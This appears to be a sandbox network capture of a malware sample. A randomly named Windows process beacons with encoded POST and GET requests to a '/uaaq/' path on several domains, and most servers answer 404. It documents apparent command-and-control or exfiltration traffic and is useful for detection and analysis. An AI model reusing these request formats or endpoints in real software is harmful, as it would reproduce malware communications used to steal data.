                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:59.522941113 CET | 161 | IN | HTTP/1.1 436
                                                                                    date: Mon, 04 Dec 2023 11:09:59 GMT
                                                                                    content-length: 0
                                                                                    server: NginX
                                                                                    connection: close


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    82 | 192.168.11.30 | 49842 | 65.108.122.245 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:10:04.727556944 CET | 713 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.mariannaserocka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.mariannaserocka.com
                                                                                    Referer: http://www.mariannaserocka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=K3dDErmwgWQgBJIxnXsYfBOUstVvZfStV6NSHWRpGtjsSppZ8mHLQgzeXwU7d65XCNxiOhYl3VeuggJaxIDe5P0dLLrW00YqtnRlyGoqGVQRYHe3uFSxV4CCph3+srDxk5+c4KGBxZG+ECZMTUlkOMedK5ktgiwHYHk/zX8qJztrbqM5TQ==
                                                                                    Dec 4, 2023 12:10:05.668194056 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:04 GMT
                                                                                    Server: Apache/2
                                                                                    X-Powered-By: PHP/8.1.25
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-UA-Compatible: IE=edge
                                                                                    Link: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Vary: Accept-Encoding,User-Agent
                                                                                    Content-Encoding: gzip
                                                                                    Content-Length: 11321
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    83 | 192.168.11.30 | 49843 | 65.108.122.245 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:10:07.446028948 CET | 733 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.mariannaserocka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.mariannaserocka.com
                                                                                    Referer: http://www.mariannaserocka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:10:08.354362965 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:07 GMT
                                                                                    Server: Apache/2
                                                                                    X-Powered-By: PHP/8.1.25
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-UA-Compatible: IE=edge
                                                                                    Link: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Vary: Accept-Encoding,User-Agent
                                                                                    Content-Encoding: gzip
                                                                                    Content-Length: 11321
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    84 | 192.168.11.30 | 49844 | 65.108.122.245 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:10:10.163456917 CET | 1650 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.mariannaserocka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.mariannaserocka.com
                                                                                    Referer: http://www.mariannaserocka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:10:11.099560022 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:10 GMT
                                                                                    Server: Apache/2
                                                                                    X-Powered-By: PHP/8.1.25
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-UA-Compatible: IE=edge
                                                                                    Link: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Vary: Accept-Encoding,User-Agent
                                                                                    Content-Encoding: gzip
                                                                                    Content-Length: 11321
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Dec 4, 2023 12:10:11.099854946 CET1340INData Raw: 3c ab c2 29 6d 13 f3 c9 a9 3b 61 1b a8 14 52 98 7f 07 08 ca 8f 47 8a ad 64 f5 7a 3a 7b e2 fa 00 e7 22 9e 7f d6 04 ec 2a e1 3b 99 5f 96 e4 94 ef 6f 97 24 6f b2 25 32 b6 90 92 9d c2 d1 bb fb bb 9d 71 11 d2 05 ef 66 1c b1 a5 09 67 f7 53 2e e9 d5 1e
                                                                                    Data Ascii: <)m;aRGdz:{"*;_o$o%2qfgS.D&H/Zn]e]WdRX3{;V&.{{7dY8s6MfaL;:GvqeF9-WXkYol0^
                                                                                    Dec 4, 2023 12:10:11.099915028 CET1340INData Raw: ce 2a ce da 60 a5 c6 a8 98 b8 27 56 16 2c 9f 72 d3 26 24 cc 68 0a 24 eb 70 20 7c 11 81 d6 6a 95 a4 b8 02 b5 5e 88 74 d4 ef 10 47 aa 68 21 a1 58 4d 8e 96 33 58 cd 1e b7 a1 ac 6b 57 d0 0a 83 70 8e 53 99 8e a4 21 d5 78 d6 f3 6b 3a ce 5e ab 6f 28 65
                                                                                    Data Ascii: *`'V,r&$h$p |j^tGh!XM3XkWpS!xk:^o(e+a2,UED9%2z7)S!R>j)x2ij88^l#fvM?C/VvO)e.J'\~%tlw/W-868YsU7
                                                                                    Dec 4, 2023 12:10:11.099981070 CET1340INData Raw: aa e2 ef 25 38 2c db 96 7b 18 2a 96 9d a1 7b 18 38 96 4d c4 bd 0d 23 4b 15 b9 b7 41 65 a9 1e d7 0a 31 3f bf a5 70 db 1e 8d 0d cb 96 72 78 e8 24 36 9b 4a 2b b1 02 f2 b3 5d 22 ef b5 fa ed 7e 5f 5e 81 5e b3 30 ce 22 57 0f 7b 61 ba c6 97 e0 b1 69 be
                                                                                    Data Ascii: %8,{*{8M#KAe1?prx$6J+]"~_^^0"W{ai]c LpSwXhH^qX3YhU,JY(8ovwVlZ,:2$"3VfCV*:n56p?^N{Lm\~ZFXP,6f=Ows;7cKgv
                                                                                    Dec 4, 2023 12:10:11.100035906 CET1340INData Raw: 78 47 d9 fd dd 43 f6 e5 60 12 e6 7e 39 98 b4 e9 60 d2 6f 2d 20 fb 72 30 e9 be 05 6b 5f 0e 26 7d 39 98 f4 e5 60 52 45 6d 7e fb 21 df 97 83 49 f7 21 1c fc 72 30 e9 cb c1 a4 2f 07 93 be 1c 4c aa ac c7 5d 1f 4c 2a 26 17 ce 0a dc e9 fd dd 66 ab df 36
                                                                                    Data Ascii: xGC`~9`o- r0k_&}9`REm~!I!r0/L]L*&f6i[5G_J{V].zXExg-gF6hq=`{=x\q.T!Zv1hg[_)<d338TLOFoY2
                                                                                    Dec 4, 2023 12:10:11.100094080 CET1340INData Raw: f7 7a 86 39 32 ec 56 bf d3 1b ef 99 6d cb b4 e8 38 23 8e c0 1b 02 a1 1c 42 23 e3 84 4d e4 2f 42 9d 51 80 4e c1 62 20 fa 92 24 a4 a6 5c 28 4f 71 52 55 71 dc 88 cf ef 1d cf 0d c3 68 7b 49 f4 74 a0 fc ac 3c c5 07 e5 a3 72 a9 d4 ab 1c e6 55 b3 93 f5
                                                                                    Data Ascii: z92Vm8#B#M/BQNb $\(OqRUqh{It<rU =SJEEk{vt:{@" x0s oD/LqjSX& h$T/!8|C@8g~@6MkS`3Upx/ #B}95K_0d3Ny
                                                                                    Dec 4, 2023 12:10:11.100198984 CET265INData Raw: 8d ed 52 48 86 9e 3b ab ef 0b 8c 1d 00 2f 7f c3 51 4b ec 95 4c 87 79 0c 44 e9 18 02 1b 88 19 21 f1 e7 8f 50 f4 84 c7 31 78 77 dc 29 2d 4a f3 67 15 3d 81 10 ba e8 50 58 a6 46 9e 22 ba f4 c7 86 ca d7 a0 87 6c bd 72 98 4e c3 03 1b 4b a0 81 21 19 4f
                                                                                    Data Ascii: RH;/QKLyD!P1xw)-Jg=PXF"lrNK!OZkt53!n}{)-qC(p1h2MqVQuBT$6oD]Ize]l 5G|nLf<4Hm>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    85 | 192.168.11.30 | 49845 | 65.108.122.245 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:10:12.883680105 CET | 431 | OUT | GET /uaaq/?9pG0L=H11jHdK8tiQEdc8HiBJGcTnPn4JeKO7dY7p2R0AEMYCSTpUW3HGmQSiGfhMiAqlsALoBPlIqyHCk3n5D4MLz3+EHJa2hwQp0yQ==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.mariannaserocka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:10:13.582057953 CET | 603 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 04 Dec 2023 11:10:12 GMT
                                                                                    Server: Apache/2
                                                                                    X-Powered-By: PHP/8.1.25
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-UA-Compatible: IE=edge
                                                                                    X-Redirect-By: WordPress
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Location: http://mariannaserocka.com/uaaq/?9pG0L=H11jHdK8tiQEdc8HiBJGcTnPn4JeKO7dY7p2R0AEMYCSTpUW3HGmQSiGfhMiAqlsALoBPlIqyHCk3n5D4MLz3+EHJa2hwQp0yQ==&XFs82=6R5Xx6907
                                                                                    Vary: User-Agent
                                                                                    Content-Length: 0
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    86 | 192.168.11.30 | 49846 | 162.0.222.119 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:10:18.769345045 CET | 719 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.spark-tech-global.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.spark-tech-global.xyz
                                                                                    Referer: http://www.spark-tech-global.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=jo/WBZ0hfuo0HFe7ObwoTcdmheGAtej032BfSubEIC7lI0fM1jEz1PApiZinHmN3Lty5tIEdIthK3LNnlWicVDXj1Efh7WuY70oUMv+Q3/G1xMkmMp6Z+r5I7M04Z/Z+gSXyG9USAFPDDsg7Fhv2DGczajONCepTzMhvQpTeygjkJ44eog==
                                                                                    Dec 4, 2023 12:10:19.108680964 CET | 587 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:18 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    87 | 192.168.11.30 | 49847 | 162.0.222.119 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:10:21.468019962 CET | 739 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.spark-tech-global.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.spark-tech-global.xyz
                                                                                    Referer: http://www.spark-tech-global.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=jo/WBZ0hfuo0GkO7M8EoU8dnkeGAjOjw3xJfSriJPwvlNlDMniEz2PAp2piiIGM1LtubtMEdIsFK3K9nlHjKTTXhh0fj/WuY70oUMva23+u124YmeY6YwL5H8M04d/ZygSXAG4w0AHHDDtw7G171MGc9UDPiGKwm7LVwR7//zyeDBNUNvYT6GJW0sZmVoCU/1fxB1xU=
                                                                                    Dec 4, 2023 12:10:21.774564028 CET | 587 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:21 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    88 | 192.168.11.30 | 49848 | 162.0.222.119 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:10:24.170696974 CET | 1656 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.spark-tech-global.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.spark-tech-global.xyz
                                                                                    Referer: http://www.spark-tech-global.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:10:24.483431101 CET | 587 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:24 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    89 | 192.168.11.30 | 49849 | 162.0.222.119 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:10:26.874689102 CET | 433 | OUT | GET /uaaq/?XFs82=6R5Xx6907&9pG0L=uqX2CpJoJvwTFA+ZFtoTb/Viquue5JaT7gdpcN3qNHbjP1Cd4gItxtd6vZy9N0V5BOWbrcI9A+ppibdEzCLbbhznzUeV+CWA9w== HTTP/1.1
                                                                                    Host: www.spark-tech-global.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:10:27.177002907 CET | 602 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:26 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    90 | 192.168.11.30 | 49850 | 83.229.19.76 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:10:32.357433081 CET | 710 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.ayotundewrites.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.ayotundewrites.com
                                                                                    Referer: http://www.ayotundewrites.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=JEKDnFX58NvT2CTMtyHb4oQN3OhxmYwlYOyRXGlhmzhp6LK23O8PrsHV+6Vx4XmURIzN7FoL0Gny3LVegKqIOQjAuO4e8JyiGQ8MMYdgipwELL0cgw7AHhrsTw0MoWv3xx1T9Fa2Y5u2LJ3tII8oeVwhTZRx8ESamS7vYxbKfxNBtZLBuA==
                                                                                    Dec 4, 2023 12:10:32.535037994 CET | 1069 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Content-Encoding: gzip


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    91 | 192.168.11.30 | 49851 | 83.229.19.76 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:10:35.060317993 CET | 730 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.ayotundewrites.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.ayotundewrites.com
                                                                                    Referer: http://www.ayotundewrites.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=JEKDnFX58NvT3ijM+kPb+IQOrehx/Iw+YO+RXCcsmHNp/e224qoPosHVrKV023mdRI/j7FkL0Gjy3Llej7qLPAjCoO4QkpyiGQ8MMc9GipoEL7EciUPDKBrvWw0MsWvzxx1l9E2YY7m2LIHtJaUnVVw7MpQ/tljwqA7UVwjzGE1RoMnSp+ZL31D0bj3B2mz3vYXbqd8=
                                                                                    Dec 4, 2023 12:10:35.237930059 CET | 1069 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Content-Encoding: gzip


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    92 | 192.168.11.30 | 49852 | 83.229.19.76 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:10:37.762887001 CET | 1647 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.ayotundewrites.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.ayotundewrites.com
                                                                                    Referer: http://www.ayotundewrites.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:10:37.941420078 CET | 1069 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Content-Encoding: gzip


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    93 | 192.168.11.30 | 49853 | 83.229.19.76 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:10:40.466039896 CET | 430 | OUT | GET /uaaq/?9pG0L=EGijkzvOzpvUykTSqEH5xYloxulInJA6Yfy3UgRPmiIu9LDG8q5Bov6ZnoBY4U7UUr/swV4XyGGNsY5GmvOqPiqhu9t92ITdQQ==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.ayotundewrites.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:10:40.643599033 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:40 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Accept-Ranges: bytes
                                                                                    Data Ascii: 5d6<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html lang="fr"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="robots" content="none,noindex,nofollow"><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><H1>Non Trouv</H1>Le document demand n'a pas t trouv sur ce serveur.<P><HR><H1>No Encontrado</H1>El documento solicitado no se encontr en este servidor.<P><HR><ADDRESS>Web Server at www.ayotundewrites.com | Powered by www.lws.fr</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short
                                                                                    Dec 4, 2023 12:10:40.643672943 CET | 426 | IN | Data Raw: 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61
                                                                                    Data Ascii: error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it
                                                                                    Dec 4, 2023 12:10:40.644722939 CET | 59 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    94 | 192.168.11.30 | 49854 | 91.195.240.19 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:10:46.065005064 CET | 698 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.popup-shops.us
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.popup-shops.us
                                                                                    Referer: http://www.popup-shops.us/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=TkZvAvBd3hCc8y317/Qsk/+SOus+y+ZQGp14rtnMD9wrE8zL69CA3llF5NHFaZVjxi8P8zAAWzKEv8eC89mJj1xNk4owGU7q1TpRccIJpDEVl3kd/JgoYmMex88FDHYTjiyamdModCbwj0w+WtWtXwPvlYkDqVtA5cutv5oXW0AH6fxbZg==
Dec 4, 2023 12:10:46.247556925 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:10:46 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
